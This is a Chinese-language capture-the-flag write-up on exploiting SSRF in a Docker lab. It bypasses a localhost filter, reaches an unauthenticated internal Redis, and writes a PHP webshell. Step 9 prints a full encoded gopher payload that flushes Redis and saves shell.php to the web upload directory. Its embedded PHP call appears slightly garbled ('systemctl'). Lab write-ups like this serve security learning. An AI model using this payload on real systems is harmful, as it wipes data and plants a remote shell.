目录
一、环境搭建
1.安装docker(Docker-compose up -d )、将web-ssrfme.zip解压缩在Ubuntu下。更新后的镜像重新启动容器,拉取ssrfme镜像。
2.构建docker-compose.yml文件
version: '3'
services:
web:
image: ctf/ssrfme
ports:
- "8091:80"
redis:
image: web-ssrfme_redis
3.docker-compose up查看
二、漏洞复现
1.访问端口
2.使用端口访问文件,可以看到有一个过滤条件,它限制了file,dict协议,127.0.0.1和localhost 也不能用,其实就是不想你探测内网端口,也不能读取内网服务文件。
3.给info随便赋一个值,出来了php界面,可以观察到hostname主机和端口,而172.21.0.3是可以绕过127.0.0.1这个条件,我们可以在这个地址上测试,不断的改变端口值,端口不一样,出来的值也会有所区别。
4.使用burpsuite去检测端口1-1000.
5.发现只开了一个80端口。
6.发现80端口不可用,后续请教同学,经过扫描ip以及分析,得出6379端口也是对外开放,
7.分析这是redis的报错,说明这台内网主机上还运行着redis服务。 这个时候第一反应就是redis未授权访问,接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。但是我们尝试发现不能直接在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。、
8.经测试upload目录下是可写的,使用工具生成payload
9.get传参,进行编码
gopher://172.21.0.3:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252436%250D%250A%250A%250A%253C%253Fphp%2520systemctl%2528%2527cat%2520/flag%2527%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A/var/www/html/upload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0A
10.拿到flag